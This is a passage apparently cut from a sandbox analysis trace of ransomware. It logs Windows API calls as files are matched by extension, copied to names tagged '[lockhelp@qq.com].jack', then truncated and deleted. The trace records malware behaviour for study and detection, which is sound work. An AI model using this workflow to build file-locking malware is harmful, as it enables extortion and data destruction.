(lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0197.638] lstrlenW (lpString=".zip") returned 4 [0197.639] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.639] lstrlenW (lpString=".rar") returned 4 [0197.639] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.639] lstrlenW (lpString=".bz2") returned 4 [0197.639] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.639] lstrlenW (lpString=".7z") returned 3 [0197.639] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.639] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0197.639] lstrlenW (lpString=".dbf") returned 4 [0197.639] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.639] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0197.639] lstrlenW (lpString=".1cd") returned 4 [0197.639] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.639] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0197.639] lstrlenW (lpString=".jpg") returned 4 [0197.639] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.639] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0197.639] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0197.639] lstrlenW (lpString=".doc") returned 4 [0197.639] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.639] lstrlenW (lpString=".docx") returned 5 [0197.639] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.639] lstrlenW (lpString=".pdf") returned 4 [0197.639] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.639] lstrlenW (lpString=".xls") returned 4 [0197.639] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.639] lstrlenW (lpString=".xlsx") returned 5 [0197.639] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.640] lstrlenW (lpString=".ppt") returned 4 [0197.640] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.640] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0197.640] lstrlenW (lpString=".zip") returned 4 [0197.640] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.640] lstrlenW (lpString=".rar") returned 4 [0197.640] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.640] lstrlenW (lpString=".bz2") returned 4 [0197.640] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.640] lstrlenW (lpString=".7z") returned 3 [0197.640] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.640] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0197.640] lstrlenW (lpString=".dbf") returned 4 [0197.640] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.640] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0197.640] lstrlenW (lpString=".1cd") returned 4 [0197.640] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.640] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0197.640] lstrlenW (lpString=".jpg") returned 4 [0197.640] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.640] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.640] lstrlenW (lpString="eula.rtf") returned 8 [0197.640] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0197.641] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=4040) returned 1 [0197.641] CloseHandle (hObject=0x3ec) returned 1 [0197.641] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf")) returned 0x80 [0197.641] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.641] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0197.641] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.641] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.641] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0197.641] GetLastError () returned 0x0 [0197.642] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0xfc8, lpOverlapped=0x0) returned 1 [0197.643] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xfd0, lpOverlapped=0x0) returned 1 [0197.644] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.644] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.644] SetEndOfFile (hFile=0x3e4) returned 1 [0197.645] CloseHandle (hObject=0x3e4) returned 1 [0197.645] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.645] SetEndOfFile (hFile=0x3ec) returned 1 [0197.646] CloseHandle (hObject=0x3ec) returned 1 [0197.646] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.647] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf")) returned 1 [0197.647] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0197.647] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0197.647] lstrlenW (lpString=".doc") returned 4 [0197.647] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.647] lstrlenW (lpString=".docx") returned 5 [0197.647] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.647] lstrlenW (lpString=".pdf") returned 4 [0197.647] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.647] lstrlenW (lpString=".xls") returned 4 [0197.647] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.647] lstrlenW (lpString=".xlsx") returned 5 [0197.647] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.647] lstrlenW (lpString=".ppt") returned 4 [0197.647] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.647] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0197.647] lstrlenW (lpString=".zip") returned 4 [0197.648] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.648] lstrlenW (lpString=".rar") returned 4 [0197.648] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.648] lstrlenW (lpString=".bz2") returned 4 [0197.648] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.648] lstrlenW (lpString=".7z") returned 3 [0197.648] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.648] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0197.648] lstrlenW (lpString=".dbf") returned 4 [0197.648] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.648] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0197.648] lstrlenW (lpString=".1cd") returned 4 [0197.648] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.648] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0197.648] lstrlenW (lpString=".jpg") returned 4 [0197.648] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.648] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0197.648] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0197.648] lstrlenW (lpString=".doc") returned 4 [0197.648] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.648] lstrlenW (lpString=".docx") returned 5 [0197.648] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.648] lstrlenW (lpString=".pdf") returned 4 [0197.648] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.648] lstrlenW (lpString=".xls") returned 4 [0197.648] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.648] lstrlenW (lpString=".xlsx") returned 5 [0197.649] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.649] lstrlenW (lpString=".ppt") returned 4 [0197.649] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.649] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0197.649] lstrlenW (lpString=".zip") returned 4 [0197.649] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.649] lstrlenW (lpString=".rar") returned 4 [0197.649] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.649] lstrlenW (lpString=".bz2") returned 4 [0197.649] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.649] lstrlenW (lpString=".7z") returned 3 [0197.649] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.649] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0197.649] lstrlenW (lpString=".dbf") returned 4 [0197.649] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.649] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0197.649] lstrlenW (lpString=".1cd") returned 4 [0197.649] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.649] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0197.649] lstrlenW (lpString=".jpg") returned 4 [0197.649] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.649] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.649] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.649] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0198.169] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=82374) returned 1 [0198.169] CloseHandle (hObject=0x410) returned 1 [0198.169] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml")) returned 0x80 [0198.169] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.169] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0198.169] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.169] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.170] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0198.170] GetLastError () returned 0x0 [0198.170] ReadFile (in: hFile=0x410, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x141c6, lpOverlapped=0x0) returned 1 [0198.232] WriteFile (in: hFile=0x3f4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x141d0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x141d0, lpOverlapped=0x0) returned 1 [0198.234] ReadFile (in: hFile=0x410, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.235] WriteFile (in: hFile=0x3f4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xf6, lpOverlapped=0x0) returned 1 [0198.235] SetEndOfFile (hFile=0x3f4) returned 1 [0198.235] CloseHandle (hObject=0x3f4) returned 1 [0198.241] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.241] SetEndOfFile (hFile=0x410) returned 1 [0198.243] CloseHandle (hObject=0x410) returned 1 [0198.243] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.243] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml")) returned 1 [0198.243] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0198.243] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0198.243] lstrlenW (lpString=".doc") returned 4 [0198.243] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.243] lstrlenW (lpString=".docx") returned 5 [0198.244] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0198.244] lstrlenW (lpString=".pdf") returned 4 [0198.244] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.244] lstrlenW (lpString=".xls") returned 4 [0198.244] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.244] lstrlenW (lpString=".xlsx") returned 5 [0198.244] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0198.244] lstrlenW (lpString=".ppt") returned 4 [0198.244] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.244] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0198.244] lstrlenW (lpString=".zip") returned 4 [0198.244] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.244] lstrlenW (lpString=".rar") returned 4 [0198.244] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.244] lstrlenW (lpString=".bz2") returned 4 [0198.244] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.244] lstrlenW (lpString=".7z") returned 3 [0198.244] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.244] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0198.244] lstrlenW (lpString=".dbf") returned 4 [0198.244] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.244] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0198.244] lstrlenW (lpString=".1cd") returned 4 [0198.244] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.244] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0198.244] lstrlenW (lpString=".jpg") returned 4 [0198.244] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.245] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0198.245] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0198.245] lstrlenW (lpString=".doc") returned 4 [0198.245] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.245] lstrlenW (lpString=".docx") returned 5 [0198.245] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0198.245] lstrlenW (lpString=".pdf") returned 4 [0198.245] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.245] lstrlenW (lpString=".xls") returned 4 [0198.245] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.245] lstrlenW (lpString=".xlsx") returned 5 [0198.245] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0198.245] lstrlenW (lpString=".ppt") returned 4 [0198.245] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.245] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0198.245] lstrlenW (lpString=".zip") returned 4 [0198.245] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.245] lstrlenW (lpString=".rar") returned 4 [0198.245] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.245] lstrlenW (lpString=".bz2") returned 4 [0198.245] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.245] lstrlenW (lpString=".7z") returned 3 [0198.245] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.245] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0198.245] lstrlenW (lpString=".dbf") returned 4 [0198.246] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.246] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0198.246] lstrlenW (lpString=".1cd") returned 4 [0198.246] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.246] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0198.246] lstrlenW (lpString=".jpg") returned 4 [0198.246] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.246] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0198.246] lstrlenW (lpString="LocalizedData.xml") returned 17 [0198.246] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0198.246] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=79996) returned 1 [0198.246] CloseHandle (hObject=0x410) returned 1 [0198.544] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml")) returned 0x80 [0198.545] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.654] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0198.654] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.654] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.654] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0198.654] GetLastError () returned 0x0 [0198.654] ReadFile (in: hFile=0x410, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x1387c, lpOverlapped=0x0) returned 1 [0198.676] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13880, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13880, lpOverlapped=0x0) returned 1 [0198.679] ReadFile (in: hFile=0x410, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.679] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xf6, lpOverlapped=0x0) returned 1 [0198.679] SetEndOfFile (hFile=0x3ec) returned 1 [0198.679] CloseHandle (hObject=0x3ec) returned 1 [0198.685] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.685] SetEndOfFile (hFile=0x410) returned 1 [0198.687] CloseHandle (hObject=0x410) returned 1 [0198.687] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.687] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml")) returned 1 [0198.688] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0198.688] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0198.688] lstrlenW (lpString=".doc") returned 4 [0198.688] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.688] lstrlenW (lpString=".docx") returned 5 [0198.688] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0198.688] lstrlenW (lpString=".pdf") returned 4 [0198.688] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.688] lstrlenW (lpString=".xls") returned 4 [0198.688] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.688] lstrlenW (lpString=".xlsx") returned 5 [0198.688] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0198.688] lstrlenW (lpString=".ppt") returned 4 [0198.688] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.688] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0198.688] lstrlenW (lpString=".zip") returned 4 [0198.688] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.688] lstrlenW (lpString=".rar") returned 4 [0198.688] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.688] lstrlenW (lpString=".bz2") returned 4 [0198.688] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.688] lstrlenW (lpString=".7z") returned 3 [0198.688] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.688] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0198.688] lstrlenW (lpString=".dbf") returned 4 [0198.689] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.689] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0198.689] lstrlenW (lpString=".1cd") returned 4 [0198.689] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.689] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0198.689] lstrlenW (lpString=".jpg") returned 4 [0198.689] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.689] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0198.689] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0198.689] lstrlenW (lpString=".doc") returned 4 [0198.689] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.689] lstrlenW (lpString=".docx") returned 5 [0198.689] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0198.689] lstrlenW (lpString=".pdf") returned 4 [0198.689] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.689] lstrlenW (lpString=".xls") returned 4 [0198.689] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.689] lstrlenW (lpString=".xlsx") returned 5 [0198.689] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0198.689] lstrlenW (lpString=".ppt") returned 4 [0198.689] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.689] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0198.689] lstrlenW (lpString=".zip") returned 4 [0198.689] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.689] lstrlenW (lpString=".rar") returned 4 [0198.689] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.689] lstrlenW (lpString=".bz2") returned 4 [0198.690] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.690] lstrlenW (lpString=".7z") returned 3 [0198.690] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.690] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0198.690] 